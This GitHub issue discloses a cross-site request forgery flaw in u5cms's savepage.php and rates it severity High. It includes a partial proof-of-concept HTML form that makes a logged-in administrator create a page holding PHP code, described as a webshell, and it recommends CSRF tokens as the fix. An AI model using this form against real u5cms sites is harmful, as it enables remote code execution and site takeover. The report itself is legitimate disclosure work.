□ u5cms / u5cms (Public)

<> Code

• Issues 7 11 Pull requests

Actions

Projects

Security

New issue

Jump to bottom

CSRF can lead to RCE if admin is targeted #51

Open

Sharpforce opened this issue on Jun 27 · 0 comments

Sharpforce commented on Jun 27 • edited •

Summary

Vulnerability Type: Cross-Site Request Forgery

Severity: High

Estimated CVSS Score: 8.3

(https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)

Vulnerable Page: u5admin/savepage.php

Impacted version: At least 8.3.5 (but I think <= 10.1.13 are vulnerable too because of commit: "Initital import

of version 8.3.5")

Description

The savepage.php page is vulnerable to a CSRF flaw that can lead to an RCE when using the ability to write PHP code within the CMS pages, if the victim/targeted user has the right privileges (ie. admin).

Proof of Concept

1. The attacker craft the following malicious pages:

```
<html>
<body>
 <form action="https://u5cmsvulnerable.com/u5admin/savepage.php" method="POST">
    <input type="hidden" name="page" value="csrftorce" />
    <input type="hidden" name="ishomepage" value="0" />
    <input type="hidden" name="content_e" value="&#91;h&#58;&#93;&#13;&#10;&lt;&#63;php&#13;&#10;&#</pre>
    <input type="hidden" name="content_d" value="TODO" />
    <input type="hidden" name="content f" value="TODO" />
    <input type="hidden" name="title_e" value="" />
    <input type="hidden" name="title d" value="" />
    <input type="hidden" name="title_f" value="" />
    <input type="hidden" name="desc_e" value="" />
    <input type="hidden" name="desc_d" value="" />
    <input type="hidden" name="desc_f" value="" />
    <input type="hidden" name="key_e" value="" />
```



2. The victim administrator click on the link and the autosubmit form is sent, the malicious pages is created with the following content (en lang here):

4. The attacker can now have RCE (here a PHP webshell) on the webserver:



Remediation

 ${\it u5cms}$ should implement token protection against CSRF attack

(https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)

Assignees	
No one assigned	
Labels	
None yet	
Projects	
None yet	
Milestone	
No milestone	
Development	
No branches or pull requests	
1 participant	